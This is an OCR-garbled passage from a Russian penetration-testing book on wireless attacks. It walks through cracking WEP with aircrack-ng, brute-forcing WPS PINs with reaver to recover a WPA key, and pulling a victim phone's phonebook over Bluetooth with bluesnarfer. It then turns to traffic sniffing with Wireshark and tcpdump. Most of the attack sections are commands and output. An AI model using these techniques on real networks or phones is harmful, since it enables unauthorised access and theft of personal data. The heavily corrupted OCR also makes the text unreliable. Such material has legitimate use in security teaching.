(тас80211 зРаРіоп тосіе ѵіР сіізаЫесі Рог [рНу0]м1ап0) 
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Теперь посмотрим на список доступных сетей и выберем нужную — ту, которая 
поддерживает \ѴЕР. 


гооТ@ка1і:~# аігосІитр-п§ иІапѲтоп 
СН 10 ][ Еіарзесі: 36 2 ][ 2016-11-08 14:15 


В55Ю 

РЫК 

Веасопз 

#ОаТа, 

#/2 

СН 

МВ 

ЕІЧС 

СІРНЕК 

АІІТН 

Е55Ю 

00: Ю:7Е: Е0:47:9С 

-34 

174 

2 

0 

5 

54 . 

ЫЕР 

ЫЕР 


Соте АпсІ 

6еТ ІТ 

Р8:ІА:67:СС:С6:Е6 

-55 

171 

13 

0 

10 

54е. 

ЫРА2 

ССМР 

Р5К 

503ѵ 

28:28:50:96:52:С0 

-50 

147 

1 

0 

10 

54е 

ЫРА2 

ССМР 

Р5К 

КеепеТ 

іс-6040 

14: СС: 20: 0Е : 87:64 

-66 

134 

1 

0 

2 

54е. 

ЫРА2 

ССМР 

Р5К 

Ьигікі 

А0:21:В7:6Р:1С:ЗС 

-63 

45 

6 

0 

7 

54е 

ЫРА2 

ССМР 

Р5К 

Сепігуг 

Р4:ВР:7Р:07:04:88 

-58 

164 

7 

0 

9 

54е 

ЫРА2 

ССМР 

Р5К 

11рѵе1_04 

8Ь 

С0:4А:00:86:49:18 

-69 

145 

671 

0 

11 

54е. 

ЫРА2 

ТКІР 

Р5К 

5аѵіог 

В8:АЗ:86:19:Е0:98 

-67 

68 

0 

0 

3 

54е 

ЫРА2 

ССМР 

Р5К 

603В 


Соберем необходимое количество пакетов (хотя бы 15 000) при помощи аіпнішпр- 
п§ и проанализируем их. 


гооТ@ка1і:~# аігосІитр-п§ -и /гооТ/м1-Рі_сіитр -с 5 --Ьбзісі 00:Ю:7Е:Е0:47:9С иІапѲтоп 


СН 5 ][ Еіаргегі: 9 

тіп 2 ][ 

2016-11-08 

14:29 





В55Ю 

рык кх(і 

Веасопз 

#ОаТа, #/2 

СН 

МВ 

ЕМС СІРНЕК АІІТН 

Е55Ю 

00: Ю :7Е:Е0:47:9С 

АпсІ 6еТ ІТ 

-23 100 

5192 

49680 164 

5 

54 . 

, ЫЕР Іл/ЕР 

Соте 

В55Ю 

5ТАТІ0М 


РЫК КаТе 

1.02І: 

Ргате 2 РгоЬе 


00: Ю :7Е:Е0:47:9С 

8С:70:5А 

:2С:40:В8 

-35 54 -6 


125 

50185 



гооТ@ка1і:~# аігсгаск-п§ /гооТ/міГі^итр-ѲІ.сар 
Орепіп§ /гооТ/міГі_сІитр-01. сар 
Кеас) 121245 раскеТ 2 . 

# В55Ю Е55Ю ЕпсгурТіоп 

1 00:Ю:7Е:Е0:47:9С Соте АпсІ 6еТ ІТ ІлІЕР (49680 ІѴз) 

С(іоо 2 Іп§ ТІГ 2 Т пеТиогк а 2 Таг§е1:. 

Орепіп§ /гооТ/міГ1_сІитр-01. сар 

АТТаск иііі Ье гезТагТесІ еѵегу 5000 сарТигесІ іѵ 2 . 

5Таг1:іп§ РТЫ аТТаск ніТН 49680 іѵ 2 . 

КЕѴ РОІЮ! [ 89:ЗА:9Р :36:8А ] 

РесгурТесІ сотесТІу: 100% 
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ѴѴРА 


В свое время ѴѴРА сменила столь ненадежный ѴѴЕР Основными преимуществами 
стали надежность, производительность, контроль и совместимость. 

Однако и у этого протокола есть свои слабые стороны: 

□ простые ключи шифрования, задаваемые пользователем; 

□ возможность подмены пакетов; 

□ проблемы с протоколом аутентификации М5-СНАР ѵ2. 

Подход к взлому сетей, защищенных ѴѴРА, кардинально другой, однако и в этом 
случае доступен хороший инструмент, предназначенный специально для таких 
целей, — Кеаѵег (входит в состав Каіі Ілніх). Основной принцип работы Кеаѵег — 
использование уязвимостей в роутерах для сбора информации о ѴѴРА. 

Когда протокол ѴѴРА только появился, у многих пользователей возникли трудно¬ 
сти с конфигурацией настроек сети. Для облегчения данной задачи была создана 
новая технология, известная как безопасная настройка ѴѴі-Рі (ѴѴі-Рі Ргоіесіесі 
ЗеШр), которая до сих пор поддерживается огромным количеством устройств. 

Эта технология должна была облегчить жизнь пользователей. Достаточно было 
нажать кнопку на роутере, и нужное устройство могло подключиться к сети прак¬ 
тически сразу же, без ввода дополнительных данных. Первая проблема заключается 
в том, что у любого, у кого есть физический доступ к роутеру, автоматически по¬ 
является возможность несанкционированного доступа в сеть. Вторая проблема — 
использование ПИН-кодов. 

ПИН-код на роутере похож на ПИН-код телефона или любого другого устройства. 
Он также состоит только из цифр, к тому же их всего восемь. Когда роутер получает 
восьмизначный код, он сначала проверяет только первые четыре цифры, и если они 
верны, то затем и вторые четыре. Это создает большую проблему в сфере безопас¬ 
ности, ведь для преодоления этого барьера надо перебрать всего 11 000 комбинаций, 
а роутер, в отличие от телефона или банкомата, не заблокирует атакующего после 
трех неверных попыток. 

Посмотрим, как будет выглядеть на практике взлом ѴѴРА с использованием Кеаѵег 
под Каіі Віпих. 

Первые шаги аналогичны. Посмотрим доступные адаптеры и подключим нужный. 
Далее необходимо выбрать адаптер, поддерживающий ѴѴР5. 

гоо1:@ка1і :~# аігтоп-п§ 

РНУ ІпСег-Расе Эгіѵег СНірзеТ 

рГіу0 мІапѲ ІИІ3945 ІпСеІ СогрогаТіоп РКО/ЫігеІезз 3945АВС [йоіап] 

(геѵ 02) 

гоо1:@ка1і:~# аігтоп-п§ зТагТ мІапѲ 
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РоипсІ 2 ргосѳ55Ѳ5 ТЬаТ соиігі саизе ТгоиЫе. 

ІГ аігосІитр-п@, аігер1ау-п§ ог аігТип-п§ зТорз і«югкіп§ аГТег 
а зЬогТ регіосі оГ Тіте, уои тау мапТ То гип 'аігтоп-п§ сЬеск кііі' 

РІР ІМате 

1125 І\ІеТмогкМапа§ег 
1226 мра_зирр1ісапТ 

РНУ ІпТегГасе Ргіѵег СЬірзеТ 

ркіуѲ м1ап0 ІМІ3945 ІпТеІ СогрогаТіоп РКО/НігеІезз 3945АВС [Соіап] 

(геѵ 02) 


(тас80211 топіТог тосіе ѵіГ епаЫесІ Гог [рЬу0]іЛап0 оп [рЬу0]м1ап0топ) 
(тас80211 зТаТіоп тосіе ѵіГ сІізаЬІесІ Гог [рЬу0]м1ап0) 


гооТ@ка1і:~# мазЬ -і мІапѲтоп --і§поге-Гсз 
ІдІазИ ѵі.5.2 Іл/іРі РгоТесТесІ 5еТир 5сап Тооі 

Соругі§ЬТ (с) 2011, ТасГісаІ №Тмогк БоІиТіопз, Сгаі§ НеГГпег <сЬеГГпег@ТаспеТзо1. 
сот> 

тосі Ьу Т6_х <Т6_х@ЬоГтаі1. сот> & РаТаНеасІ & 5охгок2212 


В55ІР 

СЬаппеІ 

К55І 

1л/Р5 Ѵегзіоп 

ІлІР5 

ЬоскесІ Е55ІР 

28:28:50: ЕР :Е7:88 

1 

-69 

1.0 

N0 

КеепеТіс-5706 

АС :9Е:17:8С:9Р:4С 

1 

-91 

1.0 

N0 

А5ЕІ5 

30:В5:С2:ВР:А4:12 

2 

-71 

1.0 

N0 

какаЬа 

Е8:РЕ:27:Р7:86:АЕ 

2 

-86 

1.0 

N0 

Ь504§ 

00:18:Е7:РЕ:С4: АС 

3 

-89 

1.0 

N0 

804ѵ 

А0:21:В7:В0:15:ЗЕ 

3 

-87 

1.0 

N0 

ѴісТогіа 

С4:ЗР:С7:85:7Е:АЕ 

5 

-70 

1.0 

N0 

ЕхЫЬіТіопізТ 


Выберем нужную сеть — с технической точки зрения все они подходят, — а затем 
подберем ПИН. 

гооТ@ка1і:~# геаѵег -і і«і1ап0топ -Ь 30:В5:С2:ВР:А4:12 
Кеаѵег ѵі.5.2 ІдІіРі РгоТесТесІ 5еТир АТТаск Тооі 

Соругі§ЬТ (с) 2011, ТасТісаІ №Тмогк БоІиТіопз, Сгаі§ НеГГпег <сЬеГГпег@ТаспеТзо1. 
сот> 

тосі Ьу Т6_х <Т6_х@ЬоТтаі1. сот> & РаТаНеасІ & 5охгок2212 

[+] ІлІаіТіп§ Гог Ьеасоп Ггот 30:В5:С2:ВР:А4:12 

[+] АззосіаТесІ міТЬ 30:В5:С2:ВР :А4:12 (Е55ІР: какаЬа) 

[+] 5ТагТіп§ Сгаскіп§ Беззіоп. Ріп соипТ: 0, Мах ріп аТТетрТз: 11000 
[Р] Е-І\Іопсе: 9с : 28:96: Ь2:4с : 54: 1Г:9сІ: а9: Ь6: с4: еГ: а0: сіе: 83:72 

[Р] РКЕ : 59: сс : 01:4а : е7:0Г: 03 : 52: Зс: 71:40:80:92:7Г: 37:83 : сіе :41 : 9а : сі9: 8с : сІГ: Ь0:96: сЬ 
: сісі : ЗЬ : 7сІ : 2е : 9е : 28 : 12 : 0а : 12 : 81 : 52 : 82 : 1Ь : 91 : 24 : 8е : 67 : 9а : 02 : 5е : 05 : 01 : 24 : а0 : са : сіе : сЬ : Ь 
2:сІ2:59:2с:69:4а:11:а0:0с:6Ь:се:45:78:сІ8:43:2сІ:Ьс:е1:78:а6:54:8с:а8:с2:ЗГ:38:10:41: 
Ь9: 8с: 5е: еа : 74:42: а7: аГ: сІ8:21: Ь5: еі: 39: 54: 1Ь: СІ5:63 : Ь0: 7Г: 2Г: сІЗ : аб: Г0:99:61:77: С0: аГ 
:7а :95: сс : 1с : 2Ь: сіб: 51:94:30:93:28: 86:39: а0: сЗ: Ьс : Ь8:47:85: 1с : 39:46: аб :63:23:03:91:4 
сі: са: с0:72:32 :Г9: аЗ :46:39: 7сІ: 57:57:97:7а: 73: ес: с5: се: 8а :0е: аа :Г0: Ь9: еЗ :02:76: са :42: 
86:38: с4:01: а8:25: Ьа: сІЬ: 93: сі: 2с: 1с:41: с7:99:48: 2сІ: аГ: 78: сісі : 73: е8: сІ7: ес: е4: с8: аі: 8Ь 
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:4-Р 

[Р] ЫР5 Мапи-РасТигег: ТР-І-ПЖ 

[Р] ЫР5 Мосіеі Мате: ТІ-ЫК841ІЧ 

[Р] ЫР5 Мосіеі МитЬег: 9.0 

[Р] Ассезз РоіпТ Зегіаі ІМитЬеі-: 1.0 

[Р] К-КІопсе: 93:43:а6:а1 :-Р0:а9:а0:-Р0:83:сЬ:-Р4:9а:05:74:сІЗ:63 

[Р] РКК: 26:21: ЗЬ: 92: с8: еа: еЬ: са:45:76:27: есі:44:75:10: 5сІ: а4: с-р: 12: сІ9:30: сІЗ: Ь5:21 

[ + ] Ріп сгаскесі іп 19215 5есопсІ5 
[+] ЫР5 РИМ: '58820263' 

[+] ЫРА Р5К: 'ту5есге1ра55' 

[+] АР 55Ю: ' какаИа' 

Теперь коротко рассмотрим другие способы взлома: \ѴРА и \УРА2. 

Офлайн-атаки. Идея такова, что при нахождении достаточно близко к пользова¬ 
телю сети и/или точке доступа появляется возможность перехвата «рукопожатий» 
(ІіагкЫіаке), пересылаемых между ними перед процессом аутентификации. Затем, 
в более спокойной обстановке, можно подобрать ключи. 

Деаутентификационные атаки. На самом деле этот метод дополняет предыдущий. 
Согласитесь, что ждать, пока пользователи будут вновь подключаться к сети, 
можно достаточно долго, поэтому проще искусственно вызвать разъединение. Для 
этих целей даже есть специальная утилита \Ѵііі1е. После того как соединение было 
разорвано, пользователь снова попытается подключиться к сети. Дальше все про¬ 
исходит уже указанным выше способом. 

Перебор. Поскольку роутеры допускают неограниченное количество попыток 
аутентификации, можно воспользоваться уже известным нам методом перебора, 
однако это может занять очень много времени. Перебирать пароли к беспроводным 
сетям можно при помощи таких утилит, как аігсгаск-п§, аігер1ау-п§ или КізМАС. 


ВІиеІіооШ 


В наши дни ВІііеі:оо!:Іі поддерживается огромным количеством устройств, что дела¬ 
ет его достаточно привлекательным для взлома. Хотя эта технология имеет доста¬ 
точно ограниченный радиус действия — около десяти метров, — нельзя списывать 
ее со счетов. В местах большого скопления людей, скажем, на конференциях, вы 
никогда не испытаете недостатка в целях. 

Следует упомянуть о том, что данный лимит может быть превышен, если вы ку¬ 
пите специальный адаптер, который позволит вам расширить зону действия до 
1000 метров. 

Работая с ВІііеіооі Іі, надо помнить об основных режимах работы данных беспро¬ 
водных устройств: 

□ доступен для обнаружения — позволяет данному устройству быть обнаружен¬ 
ным другими устройствами; 
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□ ограниченная доступность для обнаружения — позволяет данному устройству 
быть обнаруженным другими устройствами в течение короткого промежутка 
времени; 

□ недоступен для обнаружения — как следует из названия, данное устройство 
недоступно для обнаружения. 

Так же, как и \Ѵі-Рі, ВІиеГооГЬ имеет ряд уязвимостей, которые позволяют ата¬ 
кующему получить несанкционированный доступ к информации и даже взять 
устройство под свой контроль. Вот только некоторые возможности: 

□ получение копии календаря и записной книжки; 

□ удаленная активация камеры и микрофона; 

□ превращение телефона в прослушивающее устройство; 

□ совершение звонков и использование устройства для доступа в Интернет; 

□ заражение устройства вирусом. 

Приведем пример того, как можно получить данные с телефона жертвы. 

Вначале проведем подготовку: 

гоо1:@ка1і:~# шксііг -р /сІеѵ/ЫиеТооІіЕі/г-Рсотт 
гоо1:@ка1і:~# ткпосі -т 666 /сІеѵ/Ыие1:оо1:Н/г-Рсотт/0 с 216 0 
гоо1:@ка1і:~# гГкіІІ ипЫоск аіі 
гоо1:@ка1і:~# (ісісогѵРі§ ИсІѲ ир 

Проверим локальное устройство и выберем жертву: 

гоо1:@ка1і:~# (ісісогѵРі§ ИсІѲ 
Нсі0: Туре: ВК/ЕДК Виз: 115В 

ВО Асісігезз: 40: 2С: Р4: С5 :08:80 АСЕ МТІІ: 1021:8 5С0 МТІІ: 64:1 

ІІР КШММ6 

КХ Ьу1:е5:1022 ас1:0 зсо:0 еѵеп1:5:46 егтог5:0 
ТХ Ьу1:е5:678 ас1:0 зсо:0 соттапсІ5:46 еггогз:0 

гоо1:@ка1і:~# (ісііооі зсап 
5саппіп§ ... 

Р6:64:В0:71: Ю :02 Иехиз 3 

Изучим список доступных сервисов на устройстве жертвы. Также определим номер 
канала, к которому мы впоследствии подключимся. Это будет последняя цифра 
в строке СЬаппеІ/РогГ. 

гооТ@ка1і:~# зсіріооі Ьгомзе --Тгее --12сар Р8:95:С7:72:10:Е2 
Вгомзіп§ Р6:64:В0:71:Ю:02... 

АГІігіЬиІіе ІсІепІгіГіег : 0x0 - 5егѵісеКесогсІНапсІ1е 
Ігѵ(:е§ег : 0x10000 

АГІігіЬиІіе ІсІепІгіГіег : 0x1 - ЗегѵісеСІаззІОЕізІ: 
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РаТа бериепсе 
ииюіб : 0x1801 

АІІпіЬиІе ЮепТі-Ріег : 0x4 - РгоТосоЮезсгірІіогЕІБІ: 
РаТа бериепсе 
Раса бериепсе 

ииюіб : 0x0100 - І.2САР 
СРіаппеІ/РогІ: (ІпТе§еп) : Ѳхі-Р 
Раса бериепсе 
ииюіб : 0x0007 


Вгом5іп§ Р6:64:В0:71:ЮЮ2... 
бепѵісе беапсРі -Раііесі: Іпѵаіісі ап§итеп1: 

АІІгіЬиІе ІсІепТі-Ріег : 0x0 - бегѵісеКесогсІНапсіІе 
ІпТе§еп : 0х1000Ь 

АІІпіЬиІе ІсІепТі-Ріег : 0x1 - бегѵісеСІаззЮЕізТ 
Оаіа бериепсе 

ииюіб : 0ХІ12-Р - РРюпеЬоок Ассезз (РВАР) - Р5Е 
АІІгіЬиІе ІсІепТі-Ріег : 0x4 - РгоТосоЮезспірТогЕІБІ: 

РаТа бериепсе 
Раса бериепсе 

ииюіб : 0x0100 - І_2САР 
Раса бериепсе 
ииюіб : 0x0003 - крсомм 
СР іаппеІ/РогІ: (ІпТе§еп) : 0x13 
Раса бериепсе 
ииюіб : 0x0008 - овех 

АІІпіЬиІе ІсІепТі-Ріег : 0x5 - ВпоілізеСпоирЕізІ: 

Оаіа бериепсе 

ииюіб : 0x1002 - РиЫісВпомзебпоир 
АІІгіЬиІе ЮепТі-Ріег : 0x9 - ВІиеІооІРіРпо-РіІеОезсгірІіогЕізІ: 

РаТа бериепсе 
Раса бериепсе 

ииюіб : 0x1130 - РРіопеЬоок Ассезз (РВАР) 

Ѵегзіоп (Іп1:е§еп) : 0x101 
АІІпіЬиІе ІсІепТі-Ріег : 0x100 

оаіа : 4-р 42 45 58 20 50 68 6-р бе 65 62 6-р 6-р 6Ь 20 41 63 63 65 73 73 20 53 65 72 
76 65 72 00 00 

АІІгіЬиІе Юепіі-Ріег : 0x314 - бирропТесіКерозіІіопіез 
ІпТе§еп : 0x1 


Теперь скопируем первые 100 записей из телефонной книги в файл: 

пооТ@ка1і:~# Ыиезпаг-Рег -г 1-10 -С 3 -Ь Р6:64:В0:71:ЮЮ2 > /поо1:/р_Ьоок.1:х1: 


Резюме 

Беспроводные сети являются одним из самых популярных способов передачи дан¬ 
ных, это и делает их достаточно привлекательной мишенью для разного рода атак. 

Для подключения к беспроводной сети нужна точка доступа. Одна точка доступа 
может обслуживать несколько беспроводных сетей. Помните, что радиус работы 
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каждой точки доступа ограничен, поэтому для его увеличения используют несколь¬ 
ко точек, обслуживающих одну сеть. 

Для подключения к беспроводной сети вам необходимо знать пароль и «имя» 
сети — 55ГО, он может быть скрыт или виден всем желающим. 

Все данные, передающиеся по ЛѴі-Рі, шифруются. Самый стойкий алгоритм шиф¬ 
рования — ѴѴРА2, самый небезопасный — \ѴЕР. 

Взлом сети, использующей \ѴЕР-шифрование, достаточно прост. Вам просто 
необходимо собрать как можно больше пакетов, для этих целей хорошо подой¬ 
дет утилита аігшоп-п§. Далее собранные данные можно обработать аігос1шпр-п§ 
и получить ключ доступа. 

Взломать сеть, использующую \ѴРА2, гораздо сложнее. Для этого при помощи 
сниффера перехватите пакеты «рукопожатия» (ЬапбзЬаке), а затем подберите клю¬ 
чи. Чтобы не ждать появления таких пакетов, при помощи утилиты АѴіііГе можно 
«заставить» пользователей переподключиться к сети снова. 

Получить доступ к точке доступа с сконфигурированным \Ѵ РА2 можно, проведя 
атаку на ЛѴі-Еі Рго!:есі:е<] ЗеШр и подобрав РШ-код от устройства. 

Как вы знаете, в мире беспроводных сетей существует еще одна интересная техно¬ 
логия — ВІпеі ооі Іі. В наши дни он поддерживается всеми современными мобиль¬ 
ными устройствами, что также делает его привлекательной целью. Через ВІиеюоі Іі 
можно получить доступ к персональным данным, паролям или использовать взло¬ 
манное устройство как точку входа в корпоративную сеть. 



Перехват информации 


Сниффинг (5піШп§, перехват информации) — это комплекс действий для полу¬ 
чения доступа к данным, передающимся по проводам, оптоволокну, витой паре, 
радиоволнам или в любой другой среде. Вы не поверите, но до сих пор многие 
сервисы передают пароли, персональные данные и другую приватную информа¬ 
цию в открытом, незашифрованном виде, тем самым делая ее легкодоступной для 
злоумышленников. 

Прежде чем приступить к рассмотрению самого метода, вспомним основы теории 
передачи данных. 

Во-первых, ваша сетевая карта. При помощи нее вы подключаетесь к среде пере¬ 
дачи данных, это может быть кабельное или беспроводное соединение. Сетевая 
карта принимает сигналы, поступающие к ней, предположим, по проводу. Это 
обычные электрические сигналы, которые впоследствии будут трансформиро¬ 
ваны в полезную информацию. Если на сетевую карту пришел пакет, в заголовке 
которого указан сетевой адрес интерфейса (МАС), широковещательный адрес 
подсети (ЬгоасІсаяГ) или же многоадресовый пакет (тиФісазІ), то карта обработает 
эту информацию и передаст ее операционной системе. В обычной же системе се¬ 
тевая карта не будет принимать адресованную другому получателю информацию 
и просто уничтожит ее. 

Исходя из вышесказанного, чтобы перехватывать весь трафик, идущий по сети, 
необходимо изменить режим работы сетевой карты. Обычно это делается заменой 
драйвера и/или библиотеки, через которые ОС управляет сетевым интерфейсом. 
Обычно для \Ѵіпс1о\ѵ8 это \ѴіпРсар, а для Ьіпих — НЪрсар. 

Во-вторых, необходимо учесть среду передачи данных. Для беспроводных сетей все 
достаточно просто: чтобы перехватывать трафик, вам необходимо заменить драйвер 
и/или библиотеку и установить специальное ПО, о котором мы поговорим позже. 
Для сетей, в которых для подключения используется кабель, все немного сложнее, 
на них мы и остановимся. 

Для начала рассмотрим пример, когда в сети используется одна среда для пере¬ 
дачи данных — например, в старых сетях топологии типа «кольцо», где исполь- 
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зуется фактически один кабель, а для подключения интерфейса необходимы 
Т-коннекторы. 



Рис. 8.1. Топология типа «кольцо» 

Для передачи данных в такой сети используется протокол С8М А/(’[). Основная 
идея данного протокола в следующем: среду передачи данных может использо¬ 
вать только один интерфейс, и когда он передает информацию, то все остальные 
интерфейсы работают только на прием. В случае, если два интерфейса пытаются 
передавать данные одновременно, возникает коллизия. Все интерфейсы перестают 
транслировать данные и через определенный промежуток времени снова пытаются 
повторить передачу. 

Все интерфейсы в пределах такого сегмента сети получают всю информацию, кото¬ 
рая по ней проходит. По такому же принципу работает хаб (ЬчЬ). Все подключен¬ 
ные к нему компьютеры получают всю посланную в сеть информацию, несмотря 
на то что каждый из них использует для подключения свой кабель. 



Исходя из вышесказанного, можно сделать вывод, что передача данных в таких 
сетях является достаточно тривиальной задачей. 

Перехват трафика усложняется в том случае, когда для организации сети ис¬ 
пользуется свич (здаГсЬ). Дело в том, что свич знает адрес компьютера, который 
подключен к его интерфейсу, и переправляет информацию от отправителя только 
адресату и больше никому. 

И наконец, третья вещь, которая нам необходима для перехвата, — соответству¬ 
ющее ПО. Для примера мы взяли широко использующийся и очень популярный 
продукт \УігезЬагк. 
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Пассивный перехват трафика 

Самый простой и безопасный способ перехвата данных. Данный способ перехвата 
работает в сетях, которые разделяют одну и ту же среду для передачи данных (то¬ 
пология «кольцо», беспроводная передача данных), а также в сетях, построенных 
на хабах. 

Рассмотрим перехват данных с использованием \УігезЬагк. \УігезЬагк — это бес¬ 
платный программный продукт для \Ѵіпс1о\ѵз и Ілніх, который позволяет перехва¬ 
тывать, фильтровать, анализировать и сохранять сетевой трафик. Его используют 
не только эксперты по информационной безопасности, но и сетевые администра¬ 
торы — например, для того, чтобы выявить и устранить проблемы, возникающие 
в ходе работы сетевых сервисов. 

Теперь продемонстрируем возможности ѴѴІгеяІіагк для перехвата и анализа трафи¬ 
ка. Запустим ѴѴігезІіагк и выберем из списка интерфейс для мониторинга, в нашем 
случае это будет еНіО. 


ТЬе МгеіЬагк Меіѵѵоск Апаіугег 


о ѳ О 

Рііе ЕсіЛ Ѵіеѵѵ бо Саріиге Апаіуіе §шк!іс$ Теіерйопу ѴѴігеІе$5 ТооІ$ Неір 

Л • й Ш в Гі [Я] |5| О, >- й> | і 

а й П 


Я | Арр4у а Л$р4ау Лііег ... <Сіг1-/> 


а * Ьсрге55к>п... + 

ѴѴеІсоте Ю ѴѴІгезІіагк 



Сарігиге 



-изіпд Иіі5 Шеп | к І^піег а саріиге ККег _. 


3) 

е№0 



апу 

І_оорЬаск: Іо 

ЫиеТооНіО \ 

пЯод 

п^иеие 

исЫпопІ 

івЬлюіЯ 

б> Яалгіот раскеі депсгаіоп гапйркі 



1_еагп 

І^ег^ биісіе ѴѴІкі ■ Оиеіііопі апй Ап5«ег5 • Маіііпд 

Ѵои аге гиппіпс] ѴѴіге«Фіагк 2.2.1 (6Й Кеѵ 1)пкіюи/п Іют ипкпоѵѵп). 



' КслѴ Іо ІолІ ог ирііяс 

N 0 РоіксЬ 

РгоПІс: ОоЬоІІ 


Рис. 8.3. Выбор интерфейса 


После выбора интерфейса начнется сбор данных. В начале главы мы упоминали 
о том, что мониторинг трафика в беспроводных сетях работает довольно просто. 
Так оно и есть — для того, чтобы просматривать данные со всех компьютеров бес¬ 
проводной сети, достаточно просто выбрать нужный интерфейс. 
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После того как вы соберете нужное количество данных, остановите сбор пакетов. 
Теперь их можно сохранить для последующего анализа или начать его сразу же. 

За пару минут мы собрали почти 20 000 пакетов, и это при условии, что трафик 
в сети был минимальным. Разумеется, просмотреть такое количество пакетов 
вручную — задача очень трудоемкая, и для ее облегчения в \ѴігсзЬагк присутствуют 
различные фильтры. 


Оператор 

Функция 

Пример 

== 

Равно 

ір.аааг == 192.168.10.12 

е <1 

Равно 

Гср.рогі ер 80 

! = 

Не равно 

ір.аааг != 192.168.10.5 

пе 

Не равно 

ір.зге пе 192.168.10.5 

сопіаіпа 

Содержит 

Іійр сопіаіпз “уаЬоо.сот” 


Отфильтруем запросы пользователя к сайту Іспіа.пі. Начнем с [)Х8-запроса, так 
как он всегда будет первым (бпз.цгу.пате соінаіпя “Іепіа.ги”). 


Я | СІпі.цгу.іипк сопЫіп& 'Іспід.ш' 


в © О 


Не ЕЙІІ Ѵісѵѵ 6о Сіріиіс Алаіугс ЕіліііОсі ТсІсрНопу ѴѴІгсІсъь 

л я й ® в Гі ® Ш Сі .. 


Тооіі Нсір 

, [Щ а ы а іі 


ЕЭССЗ ’[ Ьхріс%ііоп_ ♦ 




Ргоіогоі 1 епдіН Іп#о 

ШШ 


237 89.873725968 

238 89.673869213 

239 89.747205324 

240 89 /47337865 

242 09.760006521 

243 89./96007982 

328 90,352641621 

329 90 352828775 

332 90 435991155 

333 90.438391774 


192 168 128.129 
192 Іба 126.129 

192.168.126.2 
192.168 126.2 

192.160.126.2 

192.168.126.2 
192.168.126.129 
192 168 126.129 
192.168 126 2 
192.168.126.2 


192 168 
192 168 
192.168. 
192 168 
192.160. 
192.168 
192.16В. 
192 168 
192.168 
192.168 


126.2 
126.2 
126.129 
126.129 
126.129 
126.129 
126.2 
126.2 
126.129 
126.129 


[>N5 

ОМЗ 

ІЖ5 

0Ы8 

0№ 

ІЖЗ 

8№ 

0№ 

0М5 

[Ж5 


диегу 
68 Біапйагй диегу 
68 Згапйагй диегу 

136 БСапйагй цисгу 

139 зсапйагй диегу 
132 ЗСапйагй диегу 
135 зсапйагй диегу 

73 зсапйвгй диегу 
73 зсапйагй дцегу 

137 ЗСапйаггі диегу 

140 БСапйагй диегу 


1 


0х48Ь8 АААА иии.іепса.ги 
ОхІбЬЗ А Іепіа .ги 
ѲхееЭЗ АААА Іепса.ги 
гсзропзс 0х2аГЗ А ѵллг. Іепіа . ги А., 
гезролзе 0x4868 аааа ѵллгіелса г... 
геяропяе 0x1663 А Іепіа.ги А 01.... 
гевролзе ОхееЭЗ алаа Іепса.ги 80... 
0х2ае7 а ісйп.іепса.ги 
0x96 2 Ь аааа ісйп.іепса .ги 
геяропяе 0х2ае7 А іегіп . Іепса. ги ... 
гезропзс 0 х9й2Ь аааа ісйп.іепса.... 


► Ргаше 235: 72 Ьусея оп ѵіге (576 Ьіся), 72 Ьугея сарсигей (576 Ьіся) оп іпсег^асе О 

► ЕСИегпсС И, $гс: Ѵтѵагс 9а 54:а5 (00:0с 29 9а:54:аЬ). Озі. ѵгеѵагс С3:01:63 (00:50:56:е3:01:63) 

► Іпсегпес Ргососоі Ѵегвіоп 4, Зге 192.168 126 129, Озі- 192.168.126.2 

► ІІзег 1>аСавгат РгоСосоІ, 5гс РогС: 50411, Озі Рог! 53 

► Ооваіл Мате Зузсеи (диегу) 


-7-г. - М 50"56 "еЗ'01 ’БЗ"В0' Ос' 70~9а 54 а5‘ 00' 6О“Ч5~0В -ГРѴ с. .") Т Г 

Гв 

5 К . . *. 

.. .ѵ Іепіа 


ваіо ео За ей е7 40 ѳо 40 іі 
8020 7в Ѳ2 С4 еь 00 35 00 26 
0030 00 00 00 00 00 00 03 77 
0040 02 72 75 00 00 01 00 01 


се 16 со а8 7е 81 сѲ < 
Ы 19 2а П 01 00 00 01 
77 77 05 6С 65 6С 74 61 


О У ѵѵіге5Нагк_е№0.20161109110129.464Ѵа7 


Раскеіз: 2283 • Різріауей: 16 (0.7%) • Ргоррей: 0 (0.0%) РгоЯе: РеГаиН 


Рис. 8.4. Запросы к РЫЗ-серверу и его ответы 


Применив фильтр, мы видим полную, последовательную историю запросов 
и ответов браузера к ОКЗ-серверу. Теперь, зная, по какому ІР-адресу будет 
происходить дальнейшая коммуникация, создадим соответствующий фильтр 
(ір.асЫг==8 1.19.72,38). 
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ГПе Ій« Ѵіеіѵ Со Серьге Лпэіуге 51а! (ЛЮ* ТеІерЬопу ѵѵігеіеи Тооіі Неір 

А Ш а ® В □ й в а . НіЗіііВ ЩёішЗ 

Йі ІрлЙЙт ■■81.19.72.38_ 


ВО -1 Ехрге«к>п_ ♦ 


ОгъНпдІіал 


РгоІскоІ ІгпдІТі I 
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Раокск: 2283 • Ойріауей: 1328 (58.2%) Цторрсй: 0 (0.0%) РгоГіІс: [ЗеТаиІІ 


Рис. 8.5. Коммуникация с веб-сервером 
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Рис. 8.6. Отслеживание потока 


Итак, мы увидели полную, стандартную картину коммуникации — запрос и ответ 
[)\8-сервера, трехстороннее «рукопожатие» и инициализацию передачи данных. 
Более того, мы увидели само содержимое пакетов. 
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Как вы можете заметить, на рис. 8.5 количество отфильтрованных пакетов равно 
2283. В каждом из них передается лишь небольшая часть данных, и понять, какую 
информацию они содержат, достаточно сложно. Для облегчения задачи в \Ѵіге$Ьагк 
присутствует замечательная возможность проследить за определенным потоком 
данных. В случае с НТТР выбираем «ГоІІоѵѵ НТТР зГгеаш». 



Рис. 8.7. Вся полезная информация в одном месте 


Следует учесть, что не всегда у вас будет доступ к графическому интерфейсу, по¬ 
этому рекомендуем ознакомиться с еще одним инструментом, который появился 
до \Уіге§Ьагк, — Гсрбшпр. 

Итак, если вы просто запустите Гсрбитр, то вся информация будет выводиться 
в реальном времени, что впоследствии сделает ее практически непригодной к ана¬ 
лизу: 

гооТ@ка1і:~# Тсрсіитр 

Тсрсіитр: ѵегЬозе оиТриТ аирргеззесі, изе -ѵ ог -ѵѵ Тог Тиіі ргоТосо! сіесосіе 
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1ізТепіп§ оп еТЬѲ, 
11:46:47.867683 ІР 
ІіТТрг: Р1а§5 [.], 
11:46:47.868400 ІР 
каіі.57728: Р1а§5 
11:46:47.870762 ІР 
агра. (44) 
11:46:47.942135 ІР 
иг-мегТ-2.сотрите 
11:46:47.943079 ІР 
асісіг.агра. (46) 
11:46:48.005087 ІР 
11:46:48.012487 
агра. (44) 
11:46:48.073047 I 
11:46:48.699462 I 
МТТрз: Р1а§5 [.], 
